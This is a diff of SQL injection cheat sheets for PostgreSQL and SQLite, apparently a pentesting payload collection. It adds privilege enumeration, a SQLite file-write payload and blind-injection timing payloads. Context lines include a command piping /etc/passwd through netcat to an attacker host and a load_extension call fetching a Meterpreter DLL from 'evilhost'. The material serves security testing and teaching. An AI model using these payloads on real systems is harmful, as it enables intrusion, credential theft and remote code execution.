AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
|
||||
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
|
||||
```
|
||||
@ -276,9 +266,9 @@ SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
|
||||
```
|
||||
|
||||
|
||||
### PostgreSQL WAF Bypass
|
||||
## PostgreSQL WAF Bypass
|
||||
|
||||
#### Alternative to Quotes
|
||||
### Alternative to Quotes
|
||||
|
||||
| Payload | Technique |
|
||||
| ------------------ | --------- |
|
||||
@ -286,6 +276,24 @@ SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
|
||||
| `SELECT $TAG$This` | Dollar-sign ( >= version 8 PostgreSQL) |
|
||||
|
||||
|
||||
## PostgreSQL Privileges
|
||||
|
||||
### PostgreSQL List Privileges
|
||||
|
||||
Retrieve all table-level privileges for the current user, excluding tables in system schemas like `pg_catalog` and `information_schema`.
|
||||
|
||||
```sql
|
||||
SELECT * FROM information_schema.role_table_grants WHERE grantee = current_user AND table_schema NOT IN ('pg_catalog', 'information_schema');
|
||||
```
|
||||
|
||||
### PostgreSQL Superuser Role
|
||||
|
||||
```sql
|
||||
SHOW is_superuser;
|
||||
SELECT current_setting('is_superuser');
|
||||
SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
- [A Penetration Tester's Guide to PostgreSQL - David Hayter - July 22, 2017](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
|
||||
|
@ -6,7 +6,7 @@
|
||||
## Summary
|
||||
|
||||
* [SQLite Comments](#sqlite-comments)
|
||||
* [SQLite Version](#sqlite-version)
|
||||
* [SQLite Enumeration](#sqlite-enumeration)
|
||||
* [SQLite String](#sqlite-string)
|
||||
* [SQLite String Methodology](#sqlite-string-methodology)
|
||||
* [SQLite Blind](#sqlite-blind)
|
||||
@ -17,22 +17,26 @@
|
||||
* [SQlite Remote Code Execution](#sqlite-remote-code-execution)
|
||||
* [Attach Database](#attach-database)
|
||||
* [Load_extension](#load_extension)
|
||||
* [SQLite File Manipulation](#SQLite-file-manipulation)
|
||||
* [SQLite Read File](#SQLite-read-file)
|
||||
* [SQLite Write File](#SQLite-write-file)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## SQLite Comments
|
||||
|
||||
| Type | Description |
|
||||
|----------------------------|-----------------------------------|
|
||||
| `/* SQLite Comment */` | C-style comment |
|
||||
| `--` | SQL comment |
|
||||
| Description | Comment |
|
||||
| ------------------- | ------- |
|
||||
| Single-Line Comment | `--` |
|
||||
| Multi-Line Comment | `/**/` |
|
||||
|
||||
|
||||
## SQLite Version
|
||||
## SQLite Enumeration
|
||||
|
||||
| Description | SQL Query |
|
||||
| ------------- | ----------------------------------------- |
|
||||
| DBMS version | `select sqlite_version();` |
|
||||
|
||||
```sql
|
||||
select sqlite_version();
|
||||
```
|
||||
|
||||
## SQLite String
|
||||
|
||||
@ -42,9 +46,12 @@ select sqlite_version();
|
||||
| ----------------------- | ----------------------------------------- |
|
||||
| Extract Database Structure | `SELECT sql FROM sqlite_schema` |
|
||||
| Extract Database Structure (sqlite_version > 3.33.0) | `SELECT sql FROM sqlite_master` |
|
||||
| Extract Table Name | `SELECT tbl_name FROM sqlite_master WHERE type='table'` |
|
||||
| Extract Table Name | `SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'` |
|
||||
| Extract Column Name | `SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'` |
|
||||
| Extract Column Name | `SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');` |
|
||||
| Extract Column Name | `SELECT MAX(sql) FROM sqlite_master WHERE tbl_name='<TABLE_NAME>'` |
|
||||
| Extract Column Name | `SELECT name FROM PRAGMA_TABLE_INFO('<TABLE_NAME>')` |
|
||||
|
||||
|
||||
## SQLite Blind
|
||||
@ -78,6 +85,7 @@ AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END
|
||||
|
||||
```sql
|
||||
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
|
||||
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
|
||||
```
|
||||
|
||||
|
||||
@ -100,6 +108,19 @@ UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');
|
||||
```
|
||||
|
||||
|
||||
## SQLite File Manipulation
|
||||
|
||||
### SQLite Read File
|
||||
|
||||
SQLite does not support file I/O operations by default.
|
||||
|
||||
|
||||
### SQLite Write File
|
||||
|
||||
```sql
|
||||
SELECT writefile('/path/to/file', column_name) FROM table_name
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user